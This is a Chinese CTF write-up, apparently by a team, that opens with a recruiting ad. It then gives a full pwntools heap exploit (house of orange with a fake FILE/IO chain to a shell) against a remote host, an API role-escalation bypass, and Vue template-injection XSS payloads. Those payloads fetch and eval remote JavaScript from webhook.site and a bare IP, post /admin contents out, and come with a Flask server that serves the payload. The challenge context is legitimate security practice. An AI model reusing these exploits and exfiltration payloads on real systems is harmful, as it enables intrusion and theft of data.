招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱
[email protected](带上简历和想加入的小组)
Pwn
ezheap
edit的size可控,所以存在堆溢出。
fake_free所以没法直接释放堆块,所以打house of orange。
禁止调用hook,直接打io链即可。
from pwn import *
libc = ELF('./libc-2.27.so')
elf = ELF('./pwn')
p = remote('113.201.14.253',20791)
def add(size):
p.sendlineafter('it:','1')
p.sendlineafter('dd:',str(size))
def show(idx):
p.sendlineafter('it:', '3')
p.sendlineafter('how:',str(idx))
def edit(idx,size,content):
p.sendlineafter('it:', '4')
p.sendlineafter('it:', str(idx))
p.sendlineafter('ize',str(size))
p.sendlineafter('put',content)
def pwn():
add(0x100)#0
edit(0,0x110,b'a'*0x108+p64(0xca1))
add(0x1000)#1
add(0xc70)#2
show(2)
p.recvuntil('2: ')
libc.address = u64(p.recv(6).ljust(8,b'\x00'))-0x3ebca0
print('libc:',hex(libc.address))
stdout = libc.address+0x3ec760
wfile_jump = libc.address+0x3e7d60
add(0xdb0)#3
add(0x10)#4
edit(4,0x20,b'a'*0x18+p64(0x211))
add(0xdc0)#5
add(0x10)#6
edit(6,0x20,b'a'*0x18+p64(0x211))
add(0x1000)#7
edit(6,0x28,b'a'*0x18+p64(0x1f1)+p64(stdout))
fake_io = flat({
0x0: b' sh',
0xa0: p64(stdout-0x130+0xd8),
0x10: p64(libc.symbols['system']),
0x20: p64(stdout),
0x98: p64(stdout-0x20+0x80),
0xd8: p64(wfile_jump + 0x48 - 0x38),
0x60: b'/bin/sh\x00',
0x80: p64(libc.symbols['system']),
0x88: p64(stdout - 0x30),
0xe0: p64(stdout - 8),
}, filler=b'\x00')
add(0x1e0)#8
add(0x1e0)#9
edit(9,len(fake_io),fake_io)
p.interactive()
pwn()
Web
OnlyBypassMe
/swagger-ui/index.html
/v3/api-docs/
http://968aabc1.clsadp.com/v3/api-docs/login
roleid为1成为admin,
/api/v1/users/updatePermission
1.0 bypass number 校验
拿flag
CrossVue
docker构建不起来的样子,本地搞吧
/view 找vue的xss
profileRegex := regexp.MustCompile(`^.{0,80}$`)
{{}}可以执行js
{{fetch('https://webhook.site/af995845-1d8a-4e49-97be-eccd2994ce69').then(a=>a.text().then(a=>eval(a)))}}
{{fetch('/admin').then(r=>r.text()).then(r=>fetch('https://webhook.site/af995845-1d8a-4e49-97be-eccd2994ce69/',{method:'POST',body:r}))}}
这个能通,目前长度137,需要缩短到80
solution1:fetch远程加载js,这样长度会缩短很多:{{fetch('http://116.198.40.182:19002/').then(a=>a.text().then(a=>eval(a)))}}
这个感觉是可以,但是我本地打不通,总之先搓一个py返回xss 目前这个webhook域名太长了
from flask import Flask, Response
app = Flask(__name__)
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Headers', 'Content-Type')
response.headers.add('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
return response
@app.route('/', defaults={'path': ''})
@app.route('/')
def serve_js(path):
js_content = "{{fetch('/admin').then(r=>r.text()).then(r=>fetch('https://webhook.site/af995845-1d8a-4e49-97be-eccd2994ce69/',{method:'POST',body:r}))}}"
# js_content = "{\"html\":\"![]()
\"}"
return Response(js_content, mimetype='application/javascript')
if __name__ == '__main__':
app.run(host='0.0.0.0',port=19002)
AI
